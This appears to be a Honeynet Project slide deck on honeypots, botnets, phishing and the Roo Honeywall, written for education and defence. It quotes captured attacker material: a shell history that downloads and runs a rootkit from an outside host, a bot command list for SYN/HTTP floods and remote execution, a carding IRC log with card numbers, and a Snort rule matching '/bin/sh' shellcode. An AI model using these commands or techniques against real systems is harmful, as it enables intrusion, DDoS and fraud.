Honeynets and The Honeynet Project

1
Honeynets and The Honeynet Project
2
Speaker
3
Purpose

• To explain our organization, our value to you,
  and our research.

4
Agenda

• The Honeynet Project and Research Alliance
• The Threat
• How Honeynets Work
• Learning More

5
Honeynet Project
6
Problem

• How can we defend against an enemy, when we dont
  even know who the enemy is?

7
Mission Statement

• To learn the tools, tactics, and motives
  involved in computer and network attacks, and
  share the lessons learned.

8
Our Goal

• Improve security of Internet at no cost to the
  public.
• Awareness Raise awareness of the threats that
  exist.
• Information For those already aware, we teach
  and inform about the threats.
• Research We give organizations the capabilities
  to learn more on their own.

9
Honeynet Project

• Non-profit (501c3) organization with Board of
  Directors.
• Funded by sponsors
• Global set of diverse skills and experiences.
• Open Source, share all of our research and
  findings at no cost to the public.
• Deploy networks around the world to be hacked.
• Everything we capture is happening in the wild.
• We have nothing to sell.

10
Honeynet Research Alliance

• Starting in 2002, the Alliance is a forum of
  organizations around the world actively
  researching, sharing and deploying honeypot
  technologies.
• http//www.honeynet.org/alliance/

11
Alliance Members

• South Florida Honeynet Project
• Georgia Technical Institute
• Azusa Pacific University
• USMA Honeynet Project
• Pakistan Honeynet Project
• Paladion Networks Honeynet Project (India)
• Internet Systematics Lab Honeynet Project
  (Greece)
• Honeynet.BR (Brazil)
• UK Honeynet
• French Honeynet Project
• Italian Honeynet Project
• Portugal Honeynet Project
• German Honeynet Project
• Spanish Honeynet Project
• Singapore Honeynet Project
• China Honeynet Project

12
The Threat
13
What we have captured

• The Honeynet Project has captured primarily
  external threats that focus on targets of
  opportunity.
• Little has yet to be captured on advanced
  threats, few honeynets to date have been designed
  to capture them.

14
The Threat

• Hundreds of scans a day.
• Fastest time honeypot manually compromised, 15
  minutes (worm, under 60 seconds).
• Life expectancies vulnerable Win32 system is
  under three hours, vulnerable Linux system is
  three months.
• Primarily cyber-crime, focus on Win32 systems and
  their users.
• Attackers can control thousands of systems
  (Botnets).

15
The Threat
16
The Motive

• Motives vary, but we are seeing more and more
  criminally motivated.
• Several years ago, hackers hacked computers.
  Now, criminals hack computers.
• Fraud, extortion and identity theft have been
  around for centuries, the net just makes it
  easier.

17
DDoS for Money
J4ck why don't you start charging for packet
attacks? J4ck "give me x amount and I'll take
bla bla offline for this amount of
time J1LL it was illegal last I checked J4ck
heh, then everything you do is illegal. Why not
make money off of it? J4ck I know plenty of
people that'd pay exorbatent amounts for
packeting
18
The Target

• The mass users.
• Tend to be non-security aware, making them easy
  targets.
• Economies of scale (its a global target).

19
Interesting Trends

• Attacks often originate from economically
  depressed countries (Romania is an example).
• Attacks shifting from the computer to the user
  (computers getting harder to hack).
• Attackers continue to get more sophisticated.

20
The Tools

• Attacks used to be primarily worms and
  autorooters.
• New advances include Botnets and Phishing.
• Tools are constantly advancing.

21
The Old Days
Jan 8 184812 HISTORY PID1246 UID0 lynx
www.becys.org/LUCKROOT.TAR Jan 8 184831
HISTORY PID1246 UID0 y Jan 8 184845 HISTORY
PID1246 UID0 tar -xvfz LUCKROOT.TAR Jan 8
184859 HISTORY PID1246 UID0 tar -xzvf Lu Jan
8 184901 HISTORY PID1246 UID0 tar -xzvf
L Jan 8 184903 HISTORY PID1246 UID0 tar
-xzvf LUCKROOT.TAR Jan 8 184906 HISTORY
PID1246 UID0 cd luckroot Jan 8 184913
HISTORY PID1246 UID0 ./luckgo 216 210 Jan 8
185107 HISTORY PID1246 UID0 ./luckgo 200
120 Jan 8 185143 HISTORY PID1246 UID0
./luckgo 64 120 Jan 8 185200 HISTORY PID1246
UID0 ./luckgo 216 200
22
Botnets

• Large networks of hacked systems.
• Often thousands, if not tens of thousands, of
  hacked systems under the control of a single
  user.
• Automated commands used to control the zombies.

23
How They Work

• After successful exploitation, a bot uses TFTP,
  FTP, or HTTP to download itself to the
  compromised host.
• The binary is started, and connects to the
  hard-coded master IRC server.
• Often a dynamic DNS name is provided rather than
  a hard coded IP address, so the bot can be easily
  relocated.
• Using a special crafted nickname like USA743634
  the bot joins the master's channel, sometimes
  using a password to keep strangers out of the
  channel

24
80 of traffic

• Port 445/TCP
• Port 139/TCP
• Port 135/TCP
• Port 137/UDP
• Infected systems most often WinXP-SP1 and Win2000

25
Bots
ddos.synflood host time delay port starts
an SYN flood ddos.httpflood url number
referrer recursive truefalse starts a
HTTP flood scan.listnetranges list scanned
netranges scan.start starts all enabled
scanners scan.stop stops all scanners http.downl
oad download a file via HTTP http.execute updates
the bot via the given HTTP URL http.update execu
tes a file from a given HTTP URL cvar.set
spam_aol_channel channel AOL Spam - Channel
name cvar.set spam_aol_enabled 1/0 AOL Spam -
Enabled?
26
Numbers

• Over a 4 months period
• More then 100 Botnets were tracked
• One channel had over 200,000 IP addresses.
• One computer was compromised by 16 Bots.
• Estimate over 1 millions systems compromised.

27
Botnet Economy

• Botnets sold or for rent.
• Saw Botnets being stolen from each other.
• Observed harvesting of information from all
  compromised machines. For example, the operator
  of the botnet can request a list of CD-keys (e.g.
  for Windows or games) from all bots. These
  CD-keys can be sold or used for other purposes
  since they are considered valuable information.

28
Phishing

• Social engineer victims to give up valuable
  information (login, password, credit card number,
  etc).
• Easier to hack the user then the computers.
• Need attacks against instant messaging.
• http//www.antiphishing.org

29
The Sting
30
Getting the Info
31
Infrastructure

• Attackers build network of thousands of hacked
  systems (often botnets).
• Upload pre-made pkgs for Phishing.
• Use platforms for sending out spoofed email.
• Use platforms for false websites.

32
A Phishing Rootkit

• -rw-r--r-- 1 free web 14834 Jun 17 1316
  ebay only
• -rw-r--r-- 1 free web 247127 Jun 14 1958
  emailer2.zip
• -rw-r--r-- 1 free web 7517 Jun 11 1153
  html1.zip
• -rw-r--r-- 1 free web 10383 Jul 3 1907
  index.html
• -rw-r--r-- 1 free web 413 Jul 18 2209
  index.zip
• -rw-r--r-- 1 free web 246920 Jun 14 2038
  massmail.tgz
• -rw-r--r-- 1 free web 8192 Jun 12 0718
  massmail.zip
• -rw-r--r-- 1 free web 12163 Jun 9 0131
  send.php
• -rw-r--r-- 1 free web 2094 Jun 20 1149
  sendspamAOL1.tgz
• -rw-r--r-- 1 free web 2173 Jun 14 2258
  sendspamBUN1.tgz
• -rw-r--r-- 1 free web 2783 Jun 15 0021
  sendspamBUNzip1.zip
• -rw-r--r-- 1 free web 2096 Jun 16 1846
  sendspamNEW1.tgz
• -rw-r--r-- 1 free web 1574 Jul 11 0108
  sendbank1.tgz
• -rw-r--r-- 1 free web 2238 Jul 18 2307
  sendbankNEW.tgz
• -rw-r--r-- 1 free web 83862 Jun 9 0956
  spamz.zip
• -rw-r--r-- 1 free web 36441 Jul 18 0052
  usNEW.zip
• -rw-r--r-- 1 free web 36065 Jul 11 1704
  bank1.tgz
• drwxr-xr-x 2 free web 49 Jul 16 1226 banka
• -rw-r--r-- 1 free web 301939 Jun 8 1317
  www1.tar.gz

33
Credit Cards Exchanging
045516 COCO_JAA !cc 045523 Chk 0,19(0
COCO_JAA 9)0 CC for U 4,1 Bob JohnsP. O.
Box 126Wendel, CA 25631United
States510-863-48844407070000588951 06/05
(All This ccs update everyday From My Hacked
shopping Database - You must regular come here
for got all this ccs) 8 9(11 TraDecS Chk_Bot
FoR goldcard9) 045542 COCO_JAA !cclimit
4407070000588951 045546 Chk 0,19(0 COCO_JAA
9)0 Limit for Ur MasterCard (5407070000788951)
0.881 (This Doesn't Mean Its Valid) 4 0(11
TraDecS Chk_bot FoR channel) 045655 COCO_JAA
!cardablesite 045722 COCO_JAA !cardable
electronics 045727 Chk 0,19(0 COCO_JAA 9)0
Site where you can card electronics 9(11
TraDecS Chk_bot FoR goldcard9) 045809
COCO_JAA !cclimit 4234294391131136 045812
Chk 0,19(0 COCO_JAA 9)0 Limit for Ur Visa
(4264294291131136) 9.697 (This Doesn't Mean
Its Valid) 4 0(11 TraDecS Chk_bot FoR channel)
34
The Future

• Hacking is profitable and difficult to get
  caught.
• Expect more attacks to focus on the end user or
  the client.
• Expect things to get worse, bad guys adapt faster.

35
Honeynets
36
Honeypots

• A honeypot is an information system resource
  whose value lies in unauthorized or illicit use
  of that resource.
• Has no production value, anything going to or
  from a honeypot is likely a probe, attack or
  compromise.
• Primary value to most organizations is
  information.

37
Advantages

• Collect small data sets of high value.
• Reduce false positives
• Catch new attacks, false negatives
• Work in encrypted or IPv6 environments
• Simple concept requiring minimal resources.

38
Disadvantages

• Limited field of view (microscope)
• Risk (mainly high-interaction honeypots)

39
Types

• Low-interaction
• Emulates services, applications, and OSs.
• Low risk and easy to deploy/maintain, but capture
  limited information.
• High-interaction
• Real services, applications, and OSs
• Capture extensive information, but high risk and
  time intensive to maintain.

40
Examples of Honeypots
Low Interaction

• BackOfficer Friendly
• KFSensor
• Honeyd
• Honeynets

High Interaction
41
Honeynets

• High-interaction honeypot designed to capture
  in-depth information.
• Information has different value to different
  organizations.
• Its an architecture you populate with live
  systems, not a product or software.
• Any traffic entering or leaving is suspect.

42
How it works

• A highly controlled network where every packet
  entering or leaving is monitored, captured, and
  analyzed.
• Data Control
• Data Capture
• Data Analysis

http//www.honeynet.org/papers/honeynet/
43
Honeynet Architecture
44
Data Control

• Mitigate risk of honeynet being used to harm
  non-honeynet systems.
• Count outbound connections.
• IPS (Snort-Inline)
• Bandwidth Throttling

45
No Data Control
46
Data Control
47
Snort-Inline
alert tcp EXTERNAL_NET any -gt HOME_NET 53
(msg"DNS EXPLOIT named"flags A
content"CD80 E8D7 FFFFFF/bin/sh" alert tcp
EXTERNAL_NET any -gt HOME_NET 53 (msg"DNS
EXPLOIT named"flags A content"CD80 E8D7
FFFFFF/bin/sh" replace"0000 E8D7
FFFFFF/ben/sh")
48
Data Capture

• Capture all activity at a variety of levels.
• Network activity.
• Application activity.
• System activity.

49
Sebek

• Hidden kernel module that captures all host
  activity
• Dumps activity to the network.
• Attacker cannot sniff any traffic based on magic
  number and dst port.

50
Sebek Architecture
51
Honeywall CDROM

• Attempt to combine all requirements of a
  Honeywall onto a single, bootable CDROM.
• May, 2003 - Released Eeyore
• May, 2005 - Released Roo

52
Eeyore Problems

• OS too minimized, almost crippled. Could not
  easily add functionality.
• Difficult to modify since LiveCD.
• Limited distributed capabilities
• No GUI administration
• No Data Analysis
• No international or SCSI support

53
Roo Honeywall CDROM

• Based on Fedora Core 3
• Vastly improved hardware and international
  support.
• Automated, headless installation
• New Walleye interface for web based
  administration and data analysis.
• Automated system updating.

54
Installation

• Just insert CDROM and boot, it installs to local
  hard drive.
• After it reboots for the first time, it runs a
  hardening script based on NIST and CIS security
  standards.
• Following installation, you get a command prompt
  and system is ready to configure.

55
First Boot
56
Install
57
Configure
58
3 Methods to Maintain

• Command Line Interface
• Dialog Interface
• Web GUI (Walleye)

59
Command Line Interface

• Local or SSH access only.
• Use the utility hwctl to modify configurations
  and restart services.
• hwctl HwTCPRATE30

60
Dialog Menu
61
Data Administration
62
Data Analysis

• Most critical part, the purpose of a honeynet is
  to gather information and learn.
• Need a method to analyze all the different
  elements of information.
• Walleye is the new solution, comes with the CDROM.

63
Walleye
64
Data Analysis
65
Data Analysis Flows
66
Data Analysis Details
67
Processes
68
Files
69
Distributed Capabilities
70
Issues

• Require extensive resources to properly maintain.
• Detection and anti-honeynet technologies have
  been introduced.
• Can be used to attack or harm other non-Honeynet
  systems.
• Privacy can be a potential issue.

71
Legal Contact for .mil / .gov

• Department of Justice Computer Crime and
  Intellectual Property Section.
• Paul Ohm
• Number (202) 514.1026
• E-Mail paul.ohm_at_usdoj.gov

72
Learning More
73
Our Website

• Know Your Enemy papers.
• Scan of the Month Challenges
• Latest Tools and Technologies
• http//www.honeynet.org/

74
Our Book
http//www.honeynet.org/book
75
Sponsoring
Advanced Network Management Lab
YOU?
76
How to Sponsor

• Sponsor development of a new tool
• Sponsor authorship of a new research paper.
• Sponsor research and development.
• Buy our book

ltproject_at_honeynet.orggt http//www.honeynet.org/fun
ds/
77
Conclusion

• The Honeynet Project is a non-profit, research
  organization improving the security of the
  Internet at no cost to the public by providing
  tools and information on cyber security threats.

78

• http//www.honeynet.org
• ltproject_at_honeynet.orggt